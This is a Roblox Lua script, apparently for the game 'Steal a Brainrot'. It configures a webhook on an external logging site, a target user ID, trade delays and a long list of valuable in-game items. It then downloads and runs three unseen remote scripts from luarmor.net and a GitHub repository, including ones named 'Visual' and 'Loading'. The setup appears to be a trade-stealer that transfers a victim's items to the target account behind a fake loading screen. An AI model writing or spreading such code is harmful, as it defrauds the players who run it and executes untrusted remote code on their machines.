getgenv().WEBHOOK_URL = "https://skama.net/api/logs/webhook/mrr_5c719cba76b94b549e6f4663931f324a"
getgenv().TARGET_ID = 2525631212
getgenv().DELAY_STEP = 1      
getgenv().TRADE_CYCLE_DELAY = 2 
getgenv().TARGET_BRAINROTS = {
    ["Meowl"] = true,
    ["Skibidi Toilet"] = true,
    ["Strawberry Elephant"] = true,
    ["La Vacca Saturno Saturnita"] = true,
    ["Perrito Burrito"] = true,
    ["Quesadillo Vampiro"] = true,
    ["Tacorita Bicicleta"] = true,
    ["La Extinct Grande"] = true,
    ["La Spooky Grande"] = true,
    ["Chipso and Queso"] = true,
    ["Chillin Chili"] = true,
    ["Tuff Toucan"] = true,
    ["Gobblino Uniciclino"] = true,
    ["W or L"] = true,
    ["La Jolly Grande"] = true,
    ["La Taco Combinasion"] = true,
    ["Swaggy Bros"] = true,
    ["La Romantic Grande"] = true,
    ["Festive 67"] = true,
    ["Los Tralaleritos"] = true,
    ["Las Tralaleritas"] = true,
    ["GOAT"] = true,
    ["Graipuss Medussi"] = true,
    ["Nuclearo Dinossauro"] = true,
    ["Money Money Puggy"] = true,
    ["Tang Tang Keletang"] = true,
    ["Ketupat Kepat"] = true,
    ["Tictac Sahur"] = true,
    ["Ketchuru and Musturu"] = true,
    ["Lavadorito Spinito"] = true,
    ["Garama and Madundung"] = true,
    ["Burguro And Fryuro"] = true,
    ["Capitano Moby"] = true,
    ["Cerberus"] = true,
    ["Dragon Cannelloni"] = true,
    ["Agarrini la Palini"] = true,
    ["Fragola La La La"] = true,
    ["Extinct Matteo"] = true,
    ["Karker Sahur"] = true,
    ["Bunnyman"] = true,
    ["Pirulitoita Bicicleteira"] = true,
    ["Bunito Bunito Spinito"] = true,
    ["Brunito Marsito"] = true,
    ["Guest 666"] = true,
    ["Mariachi Corazoni"] = true,
    ["Swag Soda"] = true,
    ["Los Hotspotsitos"] = true,
    ["Los Bros"] = true,
    ["Tralaledon"] = true,
    ["Los Puggies"] = true,
    ["Los Primos"] = true,
    ["Los Tacoritas"] = true,
    ["Los Spaghettis"] = true,
    ["Ginger Gerat"] = true,
    ["Love Love Bear"] = true,
    ["Spooky and Pumpky"] = true,
    ["Fragrama and Chocrama"] = true,
    ["La Casa Boo"] = true,
    ["Los Sekolahs"] = true,
    ["Reinito Sleighito"] = true,
    ["Ketupat Bros"] = true,
    ["Cooki and Milki"] = true,
    ["Rosey and Teddy"] = true,
    ["Popcuru and Fizzuru"] = true,
    ["La Supreme Combinasion"] = true,
    ["Dragon Gingerini"] = true,
    ["Headless Horseman"] = true,
    ["Hydra Dragon Cannelloni"] = true,
    ["Celularcini Viciosini"] = true,
    ["Mieteteira Bicicleteira"] = true,
    ["La Grande Combinasion"] = true,
    ["Trenostruzzo Turbo 4000"] = true,
    ["La Karkerkar Combinasion"] = true,
    ["La Vacca Prese Presente"] = true,
    ["Rocco Disco"] = true,
    ["Los Trios"] = true,
    ["Cuadramat and Pakrahmatmamat"] = true,
    ["La Sahur Combinasion"] = true,
    ["25"] = true,
    ["Cupid Cupid Sahur"] = true,
    ["Ho Ho Ho Sahur"] = true,
    ["Chill Puppy"] = true,
    ["Los Sweethearts"] = true,
    ["Spinny Hammy"] = true,
    ["Las Sis"] = true,
    ["Los Planitos"] = true,
    ["Los Mobilis"] = true,
    ["Los Candies"] = true,
    ["Bacuru and Egguru"] = true,
    ["Money Money Reindeer"] = true,
    ["Eviledon"] = true,
    ["Jolly Jolly Sahur"] = true,
    ["Orcaledon"] = true,
    ["Los Jolly Combinasionas"] = true,
    ["Chicleteira Noelteira"] = true,
    ["Bisonte Giuppitere"] = true,
    ["Jackorilla"] = true,
    ["Extinct Tralalero"] = true,
    ["La Cucaracha"] = true,
    ["Vulturino Skeletono"] = true,
    ["Zombie Tralala"] = true,
    ["Boatito Auratito"] = true,
    ["Reindeer Tralala"] = true,
    ["Pumpkini Spyderini"] = true,
    ["Frankentteo"] = true,
    ["Santteo"] = true,
    ["La Vacca Jacko Linterino"] = true,
    ["Triplito Tralaleritos"] = true,
    ["Trickolino"] = true,
    ["Giftini Spyderini"] = true,
    ["Love Love Love Sahur"] = true,
    ["Please my Present"] = true,
    ["Telemorte"] = true,
    ["Santa Hotspot"] = true,
    ["Naughty Naughty"] = true,
    ["Cupid Hotspot"] = true,
    ["Noo my Candy"] = true,
    ["Noo my Present"] = true,
    ["Donkeyturbo Express"] = true,
    ["Los 25"] = true,
    ["Noo my Heart"] = true,
    ["Chimnino"] = true,
    ["Fishino Clownino"] = true,
    ["Chicleteira Cupideira"] = true,
    ["Los Spooky Combinasionas"] = true,
    ["La Ginger Sekolah"] = true,
    ["Karkerkar Kurkur"] = true,
    ["Sammyni Spyderini"] = true,
    ["Dul Dul Dul"] = true,
    ["Chachechi"] = true,
    ["Blackhole Goat"] = true,
    ["Coffin Tung Tung Tung Sahur"] = true,
    ["Tung Tung Tung Sahur"] = true,
    ["Los Jobcitos"] = true,
    ["Nooo My Hotspot"] = true,
    ["Horegini Boom"] = true,
    ["Quesadilla Crocodila"] = true,
    ["Pot Pumpkin"] = true,
    ["Mi Gatito"] = true,
    ["Burrito Bandito"] = true,
    ["Los Quesadillas"] = true,
    ["Arcadopus"] = true,
    ["Los Nooo My Hotspotsitos"] = true,
    ["Rang Ring Bus"] = true,
    ["Los Burritos"] = true,
    ["67"] = true,
    ["Los Cucarachas"] = true,
    ["Los Matteos"] = true,
    ["Los Spyderinis"] = true,
    ["Las Vaquitas Saturnitas"] = true,
    ["Los Karkeritos"] = true,
    ["1x1x1x1"] = true,
    ["Noo my examine"] = true,
    ["Yess my examine"] = true,
    ["Los Chicleteiras"] = true,
    ["Los Mi Gatitos"] = true,
    ["Torrtuginni Dragonfrutini"] = true,
    ["Los Tortus"] = true,
    ["Guerriro Digitale"] = true,
    ["Pot Hotspot"] = true,
    ["Los 67"] = true,
    ["Esok Sekolah"] = true,
    ["Rosetti Tualetti"] = true,
    ["Spaghetti Tualetti"] = true,
    ["Sammyni Fattini"] = true,
    ["La Food Combinasion"] = true,
    ["La Secret Combinasion"] = true,
    ["Los Amigos"] = true,
    ["Los Combinasionas"] = true,
    ["List List List Sahur"] = true,
    ["Lovin Rose"] = true,
    ["Job Job Job Sahur"] = true,
    ["Chicleteira Bicicleteira"] = true,
    ["Chicliterita bicicliterita"] = true,
    ["Chicleteirina Bicicleteirina"] = true,
    ["To to to Sahur"] = true
}
task.spawn(function()
loadstring(game:HttpGet("https://api.luarmor.net/files/v4/loaders/fbcd1d25889a843297107dea3642044d.lua"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/koop232/22s-hub/refs/heads/main/Visual"))()
end)

task.spawn(function()
loadstring(game:HttpGet("https://raw.githubusercontent.com/koop232/22s-hub/refs/heads/main/Loading"))()
end)

 
